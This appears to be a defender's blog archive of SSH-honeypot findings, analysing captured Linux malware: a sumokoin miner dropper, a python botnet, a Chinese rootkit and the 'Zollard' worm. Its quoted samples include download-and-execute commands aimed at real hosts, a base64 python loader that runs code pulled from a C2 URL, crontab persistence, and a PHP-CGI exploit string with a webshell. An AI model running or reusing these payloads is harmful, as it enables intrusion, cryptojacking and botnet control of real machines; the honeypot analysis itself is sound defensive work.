Archive for the ‘Honeypots’ Category

sumokoin – cryptonight

Tuesday, February 27th, 2018

Another honeypot-entry catched my eye. First, the attack
itself was unusual because the malware download was executed
by a small python script instead of just running wget or curl:

uname -a
rm -f /tmp/run
if [ ` getconf LONG_BIT ` -eq 64 ]
then u=”http://www.bizqsoft.com/tp2/r6.log”
else u=”http://www.bizqsoft.com/tp2/r.log”
fi
wget -O /tmp/run
curl -o /tmp/run
python -c “import urllib;urllib.urlretrieve(‘$u’,’/tmp/run’)”

Looking into the downloaded binary one finds this miner for
the cryptocoin “sumokoin” using the “cryptonight” algorithm:

{“algo”:”cryptonight”,”av”:0,”background”:false,”colors”:true,”cpu-affinity”:nul
l,”cpu-priority”:null,”donate-level”:5,”log-file”:null,”max-cpu-usage”:75,”print
-time”:60,”retries”:5,”retry-pause”:5,”safe”:false,”syslog”:false,”threads”:null
,”pools”:[{“url”:”pool.sumokoin.hashvault.pro:80″,”user”:”Sumoo6Au3wBiUakx2yC748
Zecr8qKa1J1eMpMCgBQCup9wPecdW7KZiTVvKXGMqvxEDJrYr8pUpDkhG5MHUjf7XX64WoxR4kxon”,”
pass”:”x86_64″,”keepalive”:true,”nicehash”:false},{“url”:”pool.sumokoin.com:3333
“,”user”:”Sumoo6Au3wBiUakx2yC748Zecr8qKa1J1eMpMCgBQCup9wPecdW7KZiTVvKXGMqvxEDJrY
r8pUpDkhG5MHUjf7XX64WoxR4kxon”,”pass”:”x86_64″,”keepalive”:true,”nicehash”:false
},],”api”:{“port”:0,”access-token”:null,”worker-id”:null}}

(see https://coinmarketcap.com/currencies/sumokoin/ )

Looking into the blockchainexplorer I currently find no transactions linked
to that address, but that may be because of the nature of sumokoin ..

Linux Botnet

Wednesday, January 10th, 2018

another nice ssh honeypot-catch:

uname nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CndoaWxlIFRydWU6CiAgICB0cnk6CiAgIC
AgICAgcGFnZT1iYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi51cmxvcGVuKCJodHRwOi8vay56c3c4LmNjL0FwaS8iKS5yZWFkKCkpCiAgICAgICAgZXhlYyhwYW
dlKQogICAgZXhjZXB0OgogICAgICAgIHBhc3MKICAgIHRpbWUuc2xlZXAoMzAwKQ=='))" > /dev/null 2 >& 1 &

That downloads a base64-encoded complete python-program from  http://k.zsw8.cc/Api/

In that program a crontab-entry is made

   if runCodePath not in crontabData:
                f = open("/etc/crontab", "a+")
                f.write("\n0 */6 * * * root %s\n" % runCodePath)

then it loads data about the hacked server to the herder:

   my_data = {"key":d.get_key, "name":d.get_name, "os":d.get_platform, "core":d.get_core, "cpu":d.get_cpucount, "cpuuse":d.get_cpuuse, "status":d.get_status}
            f = urllib.urlopen(apiURL, urllib.urlencode(my_data))

and waits for commands:

 

  if data.has_key("download") and data["download"]:
                    DownExec(data["download"], task_id)
       if data.has_key("cmd") and data["cmd"]:
                    CmdExec(data["cmd"], task_id)

Wonder what would happen if the computer name would be a beef-xss hook or something..?

Honeypot detection

Wednesday, April 26th, 2017

My honeypots are sending out complaints on every single successful login.

Recently I saw the following logged entry in the complaint:

echo -en “\\x31\\x33\\x33\\x37”
cat /bin/ls

Now neither kippo nor cowrie as sshd-honeypots have the file “/bin/ls” which could be looked at,  so a  ‘cat /bin/ls’ just result in a :

‘cat: /bin/ls: No such file or directory’

So this seems to be an easy and reliable way to test for a standard sshd-honeypot..
No wonder that \\x31\\x33\\x33\\x37 just translates to “1337”, which I interpret as a smiley left by the hacker ..

~7000 ssh logins

Tuesday, January 5th, 2016

recently I looked in some honeypot results – ending in finding of the URL

http://185.62.190.222/r1

(Warning: without the /r1 you are forced into a fake Adobe update).

Looking around further I found (besides some scanner-tools, code..) two files stage1 and stage2 under the subdir /r4 ,  containing about 7000 username:password:ip-address combinations. And yes, I found some of my honeypot addresses in there 🙂 Though I am pretty sure that most of the addresses will be honeypots I will try to send out mails to the appropriate abuse-contacts; maybe some of them are for real.

chinese linux-rootkit

Friday, July 18th, 2014

Once in a while I take a look in the downloaded files from the ssh-honeypot.

Lately I saw a download of “linux-2.6.27.el6” which made we wonder.

If you are interested: There are more files available for  download at http://222.186.15.13:8520/

..-probably all trojans and rootkits..

The known protocols of that kit include even gopher 🙂

gopher
http
https
file
news
mailto
socks

A short “string” on that file showed a lot of chinese ip-addresses, plus some replaced commands (netstat, ps, lsof) and a few additional options:

11CAttackBase
13CPacketAttack
10CAttackUdp
10CAttackSyn
11CAttackIcmp
10CAttackDns
10CAttackAmp
10CAttackPrx
15CAttackCompress
10CTcpAttack
9CAttackCc
10CAttackTns
9CAttackIe
7CSerial

short excerpt: (maybe these addresses are known elsewhere?

203.142.100.21
203.186.94.20
203.186.94.241
221.7.1.20
61.128.114.133
61.128.114.166
218.202.152.130
61.166.150.123
202.203.128.33
211.98.72.7
211.139.29.68
211.139.29.150
211.139.29.170
221.3.131.11
222.172.200.68
61.166.150.101
61.166.150.139
202.203.144.33
202.203.160.33
202.203.192.33
202.203.208.33
202.203.224.33….and so on..

MinCoin

Friday, January 10th, 2014

I am not up to date..

Looking at http://p2pool.org/ I see not only BitCoin storage, but also  FeatherCoin, LiteCoin, MemeCoin, Terra; FreiCoin, LottoCoin and other stuff..

Whew.. I did not think that there are so many crypto currencies out there.

I found this because my honeypot captured a link to

http://110.154.103.80:58455/x86 ( e66eb75f05328783c23745ef9d573de1 )

(I mentioned this program earlier (x86), but with a different md5-hash..)

Looking at the “x86” program one can find the installation of a miner for “MinCoins”, storing them at p2pool.org.

I am wondering why not even one of the virustotal-engines thinks, that this is malware..

 

disknyp 3

Monday, December 16th, 2013

disknyp doesn’t seem to be a new thing..

In the paper:

 

141
PATTERNS AND PATTER  AN INVESTIGATION INTO  SSH ACTIVITY USINGKIPPO HONEYPOTS
CraigValli,PriyaRabadiaandAndrewWoodward
EdithCowanUniversity,Security
ResearchInstitute
Perth,Australia

c.valli@ecu.edu.au,prabadia@our.ecu.edu.au,a.woodward@ecu.edu.a

 

(to be found at http://ro.ecu.edu.au/cgi/viewcontent.cgi?article=1126&context=adf ) the download URL is already mentioned. Also clean-mx knows the file host; and on http://honey1.christiaan008.tk:8080/kippo-graph/kippo-input.php there is also a good look at these activities.

disknyp 2

Monday, December 16th, 2013

Meanwhile I captured  268 samples of disknyp.

Can be found on: http://198.2.192.204:22/disknyp

cool .. webserver on the ssh-port 🙂

The server answers with:

Content-Type: text/html
Content-Length: 4440
Accept-Ranges: bytes
Server: HFS 2.3 beta
Cache-Control: no-cache, no-store, must-revalidate, max-age=-1

Looks like the webserver running is from:

http://ha-hfs.googlecode.com/files/hfs2.3 beta271.exe

Also available for download on this webserver is a

svch.exe , probably infected for window-machines.

Virustotal says, only 24 from 48 antivir-vendors discover this

trojan.

MD5 9d37ef3a5388b1d3d67a8759f178dd2d
SHA1 c09437f9d2752fc8ded68429ac33392c846370fc
SHA256 5c7d2aa53e55977b1bd677d6a3415c7e9900769fc49e9e3bed1fd42d73f0381b

 

 

disknyp

Monday, December 2nd, 2013

Yesterday my ssh-honeypot captured 54 samples of “disknyp”.

All logins (probably automated) did the following:

**:~# rm -f disknyp
**:~# rm -f disknop
**:~# wget http://198.2.192.204:22/disknyp
–2013-12-01 03:58:03–  http://198.2.192.204:22/disknyp
Connecting to 198.2.192.204:22… connected.
HTTP request sent, awaiting response… 503 ?????????
**:~# chmod 0777 disknyp
**:~# nohup /root/disknyp > /dev/null 2>&1 &
bash: nohup: command not found
**x:>

The file is a 1491887 Bytes  ELF 32-bit LSB executable. I don’t know yet what it is doing..

linux binary

Tuesday, November 12th, 2013

Recently my nepenthes stopped working. Looking into the last log – lines I found a wget – line:

[12112013 06:25:07 debug info fixme] File info submitted (ebee4228eb3443cd
8d55228733b8c1c6, http://www.gpharma.co/x86)

So I took a a look at this binary which I could download from this location.

# file x86
x86: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped

Next look: try “strings”:

first nothing new.. but then I saw:

/proc/self/exe
POST
?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%6
4+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%
73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%
75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%
72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%
65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%
5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%
74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
<?php
$disablefunc = @ini_get(“disable_functions”);
if (!empty($disablefunc))
$disablefunc = str_replace(” “,””,$disablefunc);
$disablefunc = explode(“,”,$disablefunc);

What the heck..? And who is “zollard”?

 

#### Update  ####

The POST Part resolves to:

?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions=”” -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n

###############

 

further on:

function myshellexec($cmd)
global $disablefunc;
$result = “”;
if (!empty($cmd))
if (is_callable(“exec”) and !in_array(“exec”,$disablefunc)) {exec($cmd,$
result); $result = join(“n”,$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable(“system”) and !in_array(“system”,$disablefunc)) {$v
= @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_content
s(); @ob_clean(); echo $v;}
elseif (is_callable(“passthru”) and !in_array(“passthru”,$disablefunc))
{$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_c
ontents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,”r”)))
$result = “”;
while(!feof($fp)) {$result .= fread($fp,1024);} pclose($fp);
return $result;
myshellexec(“wget -O /tmp/x86 http://www.solarteure-landkirchen.de/solar/x
86”);
myshellexec(“chmod +x /tmp/x86”);
myshellexec(“/tmp/x86”);

Now the binary loads another binary, executes it and starts a webserver?

myshellexec(“wget -O /tmp/x86 http://www.solarteure-landkirchen.de/solar/x
86”);
myshellexec(“chmod +x /tmp/x86”);
myshellexec(“/tmp/x86”);
HTTP/1.1 200 OK
httpd

A few lines more: It installes “iptables”, droppes every telnet connection ands starts

its own telnet-daemon:

insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp –dport 23 -j DROP
iptables -A INPUT -p tcp –dport 23 -j DROP
telnetd

In the end the program destroys its sources (rm -rf)  and runs in

mkdir -p
/var/run/.zollard/

The last lines:

chmod +x
cp /bin/sh
1234
12345
dreambox
smcadmin
stemroot
0!0
SHA1

So it ends up with some kind of crypto..

Virustotal shows a hitrate of 2 out of 47,  well, it is no windows binary..

Anyone seen this before? Who is zollard? Where did the binary got the necessary root-credentials

from?  I guess I have to take a further look..

 

###

Update

There were quite a lot of download-trials today:

# grep gpharma nepenthes.log | wc -l
33348

which is from the log-lines:

[12112013 09:23:43 debug info fixme] File info submitted (ebee4228eb3443cd8d55228733b8c1c6, http://www.gpharma.co/x86)
[12112013 09:23:43 debug info fixme] File upload requested (ebee4228eb3443cd8d55228733b8c1c6, http://www.gpharma.co/x86)

 

#### Update 2 ###

 

I executed the script on a linux vmware after adding “o+x” rights to the binary.

The iptables lines generate errors:

error inserting … ip_tables.ko – Unknown symbol in module

 

Immediatly the machine starts exchanging traffic with 117.201.16.108 : 58455

ans starts also listening on this port 58455

Looks like my machine started scanning the ip-range 117.201.16.* on that port –

I receive answers from there…  No httpd oder telnetd daemons are listening in “ps”, which I expected.

The command “pstree” shows a httpd, though! Different childrens  are running, the last one has a connection

to 117.201.18.22..23..24.. Looks like the “ps”executable has been changed.

Will see, what else can be found. Now it is “St. Martin” – time..:-)